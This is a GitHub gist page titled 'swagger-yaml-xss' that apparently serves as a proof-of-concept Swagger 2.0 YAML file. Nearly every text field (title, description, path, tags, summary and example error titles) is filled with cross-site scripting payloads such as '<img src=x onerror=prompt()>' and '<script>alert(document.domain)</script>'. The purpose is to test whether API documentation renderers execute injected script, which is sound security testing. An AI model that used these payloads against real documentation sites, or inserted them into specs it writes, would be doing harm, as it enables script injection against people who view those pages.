Last active
February 17, 2020 11:40
-
-
Save yak0n/a4f3bcef6d5eb01c0c72a7d9f479cf28 to your computer and use it in GitHub Desktop.
swagger-yaml-xss
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0" | |
| info: | |
| title: test<img src=x onerror=prompt()> | |
| version: "1.1" | |
| description: description test<img src=x onerror=prompt()> | |
| schemes: ["https"] | |
| basePath: "/" | |
| paths: | |
| /<script>alert(document.domain)</script>: | |
| get: | |
| tags: | |
| - "<img src=x onerror=prompt()>" | |
| summary: <img src=x onerror=prompt()> | |
| responses: | |
| 400: | |
| description: <img src=x onerror=prompt()> | |
| examples: | |
| application/json: | |
| errors: | |
| - id: e183203d-9168-44de-834a-1b0ccb21df87 | |
| timestamp: "2017-07-04T16:20:50.52Z" | |
| code: error.client.validation.email | |
| status: "400" | |
| title: "<img src=x onerror=prompt()>" | |
| detail: "Email address is invalid. A valid email address is like 'john.smith@example.com'." | |
| - id: 23b1189d-ff2b-4865-b0f1-491138de7db8 | |
| timestamp: "2017-07-04T16:20:50.52Z" | |
| code: error.client.validation.email.password.strength | |
| status: "400" | |
| title: "<img src=x onerror=prompt()>" | |
| detail: "Password is invalid. It shall be minimum 8 characters in length. It shall contain three out of the following items: Uppercase Letters, Lowercase Letters, Numbers, Symbols" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment